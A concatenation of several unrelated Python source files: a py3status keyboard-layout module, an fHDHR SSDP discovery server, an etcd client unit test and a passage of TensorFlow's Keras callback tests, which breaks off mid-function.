i = self.py3_command_output("xkb-switch -p").strip()
s = self.py3_command_output("xkb-switch -l").splitlines()
self.py3_command_run("xkb-switch -s {}".format(s[s.index(i) - 1]))
class Xkblayout_State(Xkb):
"""
xkblayout-state - a command-line program to get/set the current keyboard layout
"""
def setup(self, parent):
self.placeholders = list("cnsveC")
self.separator = "|SEPARATOR|"
self.xkblayout_command = "xkblayout-state print {}".format(
self.separator.join("%" + x for x in self.placeholders)
)
def get_xkb_inputs(self):
line = self.py3_command_output(self.xkblayout_command)
xkb_input = dict(zip(self.placeholders, line.split(self.separator)))
xkb_input["n"] = self.name_mapping.get(xkb_input["s"], xkb_input["n"])
return [xkb_input]
def set_xkb_layout(self, delta):
self.py3_command_run(
"xkblayout-state set {}{}".format({+1: "+", -1: "-"}[delta], abs(delta))
)
class Swaymsg(Xkb):
"""
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads
from fnmatch import fnmatch
self.excluded = ["alias"]
self.fnmatch, self.loads = (fnmatch, loads)
self.map = {"enabled": True, "disabled": False, "none": None}
self.swaymsg_command = ["swaymsg", "--raw", "--type", "get_inputs"]
def add_libinput(self, _input):
libinput = _input.pop("libinput", {})
_input.update({k: self.map.get(v, v) for k, v in libinput.items()})
return _input
def update_xkb_input(self, xkb_input, _filter):
xkb_input["alias"] = _filter.get("alias", xkb_input["name"])
if "xkb_active_layout_name" in xkb_input:
c = xkb_input["xkb_active_layout_index"]
C = len(xkb_input["xkb_layout_names"])
n = xkb_input["xkb_active_layout_name"]
s, v = self.reverse_name_mapping.get(n, (None, None))
if s is None and "(" in n and ")" in n:
s = n[n.find("(") + 1 : n.find(")")].lower()
n = n[: n.find("(") - 1]
xkb_input["xkb_layout_names"] = ", ".join(xkb_input["xkb_layout_names"])
xkb_input.update({"c": c, "C": C, "s": s, "e": v or s, "n": n, "v": v})
return xkb_input
def get_xkb_inputs(self):
try:
xkb_data = self.loads(self.py3_command_output(self.swaymsg_command))
except Exception:
xkb_data = []
new_input = []
for xkb_input in xkb_data:
if self.parent.inputs:
for _filter in self.parent.inputs:
for key, value in _filter.items():
if key in self.excluded or key not in xkb_input:
continue
if not self.fnmatch(xkb_input[key], value):
break
else:
new_input.append(self.update_xkb_input(xkb_input, _filter))
else:
_filter = {}
new_input.append(self.update_xkb_input(xkb_input, _filter))
return new_input
class Py3status:
"""
"""
# available configuration parameters
button_next = 4
button_prev = 5
cache_timeout = 10
format = "{format_input}"
format_input = r"[{alias}][\?soft ][\?color=s {s}[ {v}]]"
format_input_separator = " "
inputs = []
switcher = None
thresholds = [
("fr", "lightgreen"),
("ru", "lightcoral"),
("ua", "khaki"),
("us", "lightskyblue"),
]
def post_config_hook(self):
switchers = ["xkb-switch", "xkblayout-state", "xkbgroup", "swaymsg"]
if not self.switcher:
if self.py3.get_wm_msg() == "swaymsg":
self.switcher = "swaymsg"
else:
self.switcher = self.py3.check_commands(switchers)
elif self.switcher not in switchers:
raise Exception(STRING_ERROR.format(self.switcher))
elif not self.py3.check_commands(self.switcher):
raise Exception(STRING_NOT_INSTALLED.format(self.switcher))
if not self.switcher:
raise Exception(STRING_NOT_AVAILABLE)
self.error = None
self.input_backend = globals()[self.switcher.replace("-", "_").title()](self)
if getattr(self, "listener", True):
self.listener_backend = Listener(self)
self.thresholds_init = {}
for name in ["format", "format_input"]:
self.thresholds_init[name] = self.py3.get_color_names_list(
getattr(self, name)
)
def _stop_on_errors(self):
if self.error:
self.kill()
self.py3.error(str(self.error), self.py3.CACHE_FOREVER)
def xkb_input(self):
xkb_inputs = self.input_backend.get_xkb_inputs()
self._stop_on_errors()
new_input = []
for _input in xkb_inputs:
_input = self.input_backend.add_libinput(_input) or _input
for x in self.thresholds_init["format_input"]:
if x in _input:
self.py3.threshold_get_color(_input[x], x)
new_input.append(self.py3.safe_format(self.format_input, _input))
format_input_separator = self.py3.safe_format(self.format_input_separator)
format_input = self.py3.composite_join(format_input_separator, new_input)
input_data = {
"format_input": format_input,
"input": len(xkb_inputs),
"switcher": self.switcher,
}
for x in self.thresholds_init["format"]:
if x in input_data:
self.py3.threshold_get_color(input_data[x], x)
return {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, input_data),
}
def kill(self):
try:
self.listener_backend.kill()
except AttributeError:
pass
def on_click(self, event):
button = event["button"]
if button == self.button_next:
self.input_backend.set_xkb_layout(+1)
elif button == self.button_prev:
self.input_backend.set_xkb_layout(-1)
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
__init__.py | # Adapted from https://github.com/MoshiBin/ssdpy and https://github.com/ZeWaren/python-upnp-ssdp-example
import socket
import struct
import threading
class SSDPServer():
"""
fHDHR SSDP server.
"""
def __init__(self, fhdhr):
self.fhdhr = fhdhr
self.ssdp_handling = {}
self.methods = [x for x in list(self.fhdhr.plugins.plugins.keys()) if self.fhdhr.plugins.plugins[x].type == "ssdp"]
if self.multicast_address and self.fhdhr.config.dict["ssdp"]["enabled"] and len(self.methods):
self.fhdhr.logger.info("Initializing SSDP system")
try:
self.setup_ssdp()
self.sock.bind((self.bind_address, 1900))
self.msearch_payload = self.create_msearch_payload()
self.max_age = int(fhdhr.config.dict["ssdp"]["max_age"])
self.age_time = None
self.ssdp_doalive_url = "/api/ssdp?method=alive"
self.fhdhr.scheduler.every(self.max_age).seconds.do(self.fhdhr.api.threadget, url=self.ssdp_doalive_url)
self.ssdp_method_selfadd()
self.m_search()
self.fhdhr.threads["ssdp"] = threading.Thread(target=self.run)
except OSError as err:
self.fhdhr.logger.Error("SSDP system will not be Initialized: %s" % err)
elif not self.fhdhr.config.dict["ssdp"]["enabled"]:
self.fhdhr.logger.info("SSDP system will not be Initialized: Not Enabled")
elif not self.multicast_address:
self.fhdhr.logger.info("SSDP system will not be Initialized: Address not set in [ssdp]multicast_address or [fhdhr]discovery_address")
elif not len(self.methods):
self.fhdhr.logger.info("SSDP system will not be Initialized: No SSDP Plugins installed.")
else:
self.fhdhr.logger.info("SSDP system will not be Initialized")
def ssdp_method_selfadd(self):
"""
Add SSDP methods.
"""
self.fhdhr.logger.info("Detecting and Opening any found SSDP plugins.")
for plugin_name in list(self.fhdhr.plugins.plugins.keys()):
if self.fhdhr.plugins.plugins[plugin_name].type == "ssdp":
method = self.fhdhr.plugins.plugins[plugin_name].name.lower()
plugin_utils = self.fhdhr.plugins.plugins[plugin_name].plugin_utils
self.ssdp_handling[method] = self.fhdhr.plugins.plugins[plugin_name].Plugin_OBJ(self.fhdhr, plugin_utils, self.broadcast_ip, self.max_age)
def start(self):
"""
Start SSDP.
"""
self.fhdhr.logger.info("SSDP Server Starting")
self.fhdhr.threads["ssdp"].start()
def stop(self):
"""
Safely Shutdown SSDP.
"""
self.fhdhr.logger.info("SSDP Server Stopping")
self.sock.close()
def run(self):
"""
Listen for SSDP Requests.
"""
self.do_alive()
while True:
data, address = self.sock.recvfrom(1024)
self.on_recv(data, address)
self.stop()
def do_alive(self):
"""
Notify Network of SSDP.
"""
if self.broadcast_address_tuple:
self.fhdhr.logger.info("Sending Alive message to network.")
self.do_notify(self.broadcast_address_tuple)
def do_notify(self, address):
"""
Notify Network of SSDP.
"""
notify_list = []
for ssdp_handler in list(self.ssdp_handling.keys()):
if self.ssdp_handling[ssdp_handler].enabled and hasattr(self.ssdp_handling[ssdp_handler], 'notify'):
notify_data = self.ssdp_handling[ssdp_handler].notify
if isinstance(notify_data, list):
notify_list.extend(notify_data)
else:
notify_list.append(notify_data)
for notifydata in notify_list:
notifydata = notifydata.encode("utf-8")
self.fhdhr.logger.ssdp("Created {}".format(notifydata))
try:
self.sock.sendto(notifydata, address)
except OSError as e:
# Most commonly: We received a multicast from an IP not in our subnet
self.fhdhr.logger.ssdp("Unable to send NOTIFY: %s" % e)
pass
def on_recv(self, data, address):
"""
Handle Reqeusts for SSDP information.
"""
self.fhdhr.logger.ssdp("Received packet from {}: {}".format(address, data))
try:
header, payload = data.decode().split('\r\n\r\n')[:2]
except ValueError:
self.fhdhr.logger.error("Error with Received packet from {}: {}".format(address, data))
return
lines = header.split('\r\n')
cmd = lines[0].split(' ')
lines = map(lambda x: x.replace(': ', ':', 1), lines[1:])
lines = filter(lambda x: len(x) > 0, lines)
headers = [x.split(':', 1) for x in lines]
headers = dict(map(lambda x: (x[0].lower(), x[1]), headers))
for ssdp_handler in list(self.ssdp_handling.keys()):
if self.ssdp_handling[ssdp_handler].enabled and hasattr(self.ssdp_handling[ssdp_handler], 'on_recv'):
self.ssdp_handling[ssdp_handler].on_recv(headers, cmd, list(self.ssdp_handling.keys()))
if cmd[0] == 'M-SEARCH' and cmd[1] == '*':
# SSDP discovery
self.fhdhr.logger.ssdp("Received qualifying M-SEARCH from {}".format(address))
self.fhdhr.logger.ssdp("M-SEARCH data: {}".format(headers))
self.do_notify(address)
if cmd[0] == 'NOTIFY' and cmd[1] == '*':
self.fhdhr.logger.ssdp("NOTIFY data: {}".format(headers))
else:
self.fhdhr.logger.ssdp('Unknown SSDP command %s %s' % (cmd[0], cmd[1]))
def m_search(self):
"""
Search Network for SSDP
"""
data = self.msearch_payload
if self.broadcast_address_tuple:
self.sock.sendto(data, self.broadcast_address_tuple)
def create_msearch_payload(self):
"""
Create Payload for searching network.
"""
data = ''
data_command = "M-SEARCH * HTTP/1.1"
data_dict = {
"HOST": "%s:%s" % (self.broadcast_ip, 1900),
"MAN": "ssdp:discover",
"ST": "ssdp:all",
"MX": 1,
}
data += "%s\r\n" % data_command
for data_key in list(data_dict.keys()):
data += "%s:%s\r\n" % (data_key, data_dict[data_key])
data += "\r\n"
return data.encode("utf-8")
@property
def multicast_address(self):
"""
The Address for multicast to listen.
"""
if self.fhdhr.config.dict["ssdp"]["multicast_address"]:
return self.fhdhr.config.dict["ssdp"]["multicast_address"]
elif self.fhdhr.config.dict["fhdhr"]["discovery_address"]:
return self.fhdhr.config.dict["fhdhr"]["discovery_address"]
return None
def setup_ssdp(self):
"""
Setup SSDP basics.
"""
self.sock = None
self.proto = self.setup_proto()
self.iface = self.fhdhr.config.dict["ssdp"]["iface"]
self.setup_addressing()
self.sock = socket.socket(self.af_type, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.setup_interface()
self.setup_multicasting()
def setup_proto(self):
"""
Setup SSDP protocols.
"""
proto = self.fhdhr.config.dict["ssdp"]["proto"]
allowed_protos = ("ipv4", "ipv6")
if proto not in allowed_protos:
raise ValueError("Invalid proto - expected one of {}".format(allowed_protos))
return proto
def setup_addressing(self):
"""
Setup SSDP addressing.
"""
if self.proto == "ipv4":
self.af_type = socket.AF_INET
self.broadcast_ip = "239.255.255.250"
self.broadcast_address_tuple = (self.broadcast_ip, 1900)
self.bind_address = "0.0.0.0"
elif self.proto == "ipv6":
self.af_type = socket.AF_INET6
self.broadcast_ip = "ff02::c"
self.broadcast_address_tuple = (self.broadcast_ip, 1900, 0, 0)
self.bind_address = "::"
else:
self.broadcast_address_tuple = None
def setup_interface(self):
"""
Setup SSDP interface.
"""
# Bind to specific interface
if self.iface is not None:
self.sock.setsockopt(socket.SOL_SOCKET, getattr(socket, "SO_BINDTODEVICE", 25), self.iface)
def setup_multicasting(self):
"""
Setup SSDP multicasting.
"""
# Subscribe to multicast address
if self.proto == "ipv4":
mreq = socket.inet_aton(self.broadcast_ip)
if self.multicast_address is not None:
mreq += socket.inet_aton(self.multicast_address)
else:
mreq += struct.pack(b"@I", socket.INADDR_ANY)
self.sock.setsockopt(
socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
# Allow multicasts on loopback devices (necessary for testing)
self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
elif self.proto == "ipv6":
# In IPv6 we use the interface index, not the address when subscribing to the group
mreq = socket.inet_pton(socket.AF_INET6, self.broadcast_ip)
if self.iface is not None:
iface_index = socket.if_nametoindex(self.iface)
# Send outgoing packets from the same interface
self.sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_IF, iface_index)
mreq += struct.pack(b"@I", iface_index)
else:
mreq += socket.inet_pton(socket.AF_INET6, "::")
self.sock.setsockopt(
socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq,
)
self.sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_LOOP, 1)
|
etcd_client_test.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import unittest
from edl.discovery.etcd_client import EtcdClient
from edl.utils import string_utils
class TestEtcd(unittest.TestCase):
def setUp(self):
self.etcd = EtcdClient()
self.etcd.init()
def add(self):
local_servers = {"127.0.0.1:1": "first", "127.0.0.1:2": "second"}
for k, v in local_servers.items():
self.etcd.set_server_not_exists("job_1", k, v)
servers = self.etcd.get_service("job_1")
assert len(servers) == 2, "must two servers"
for server_meta in servers:
value = local_servers[string_utils.bytes_to_string(server_meta.server)]
assert value == string_utils.bytes_to_string(server_meta.info)
def refresh(self):
self.etcd.refresh("job_1", "127.0.0.1:1")
self.etcd.refresh("job_1", "127.0.0.1:2")
def get_service(self):
servers = self.etcd.get_service("job_1")
assert len(servers) == 0, "key must not alive when expired."
self.etcd.refresh("job_1", "127.0.0.1:1")
def remove_service(self):
self.etcd.remove_service("job_1")
servers = self.etcd.get_service("job_1")
assert len(servers) == 0, "key must not alive after sevice is deleted."
def test_etcd(self):
self.add()
self.etcd.remove_service("job_1")
self.add()
self.refresh()
time.sleep(15)
self.get_service()
def update_key(self):
self.etcd.set_server_not_exists("job_2", "127.0.0.1:1", "first")
def test_watch(self):
events = []
def watch_call_back(add_servers, rm_servers):
for server_meta in add_servers:
print(
"put server:{} value:{}".format(
server_meta.server, server_meta.info
)
)
events.append(server_meta)
for server_meta in rm_servers:
print(
"delete server:{} value:{}".format(
server_meta.server, server_meta.info
)
)
events.append(server_meta)
watch_id = self.etcd.watch_service("job_2", watch_call_back)
t = threading.Thread(name="update_key_prefix", target=self.update_key)
t.start()
t.join()
print("watch_id:", watch_id)
time.sleep(3)
self.etcd.cancel_watch(watch_id)
print("events len:", len(events))
assert len(events) == 1
assert string_utils.bytes_to_string(events[0].server) == "127.0.0.1:1"
assert string_utils.bytes_to_string(events[0].info) == "first"
def test_lease(self):
self.add()
for i in range(20):
self.refresh()
servers = self.etcd.get_service("job_1")
assert len(servers) == 2, "must two servers"
time.sleep(2)
def test_permanent(self):
self.etcd.set_server_not_exists("job_permanent", "127.0.0.1:1", "first", ttl=6)
self.etcd.set_server_permanent("job_permanent", "127.0.0.1:1", "first")
time.sleep(10)
servers = self.etcd.get_service("job_permanent")
assert len(servers) == 1, "server must exist"
if __name__ == "__main__":
unittest.main()
|
callbacks_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
adam.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
model = self._get_model()
counter = Counter()
model.evaluate(x, y, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
model = self._get_model()
counter = Counter()
model.predict(x, batch_size=2, callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 7: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=30,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegexp(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
def _run_load_weights_on_restart_test_common_iterations(self):
def get_input_datasets():
# Simple training input.
train_input = [[1]] * 16
train_label = [[0]] * 16
ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
class Bias(base_layer.Layer):
def build(self, input_shape):
self.bias = self.add_variable('bias', (1,), initializer='zeros')
def call(self, inputs):
return inputs + self.bias
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
filepath = os.path.join(self.get_temp_dir(), 'checkpoint.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
model.fit(
train_ds,
epochs=3,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
])
# The filepath should exist after fitting with callback.
self.assertTrue(os.path.exists(filepath))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
self.assertTrue(os.path.exists(filepath))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Asserting the weights one epoch after initial fitting and another epoch
# after that are closed, if a ModelCheckpoint with
# load_weights_on_restart=True is given (so the model is restored at the
# beginning of training).
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
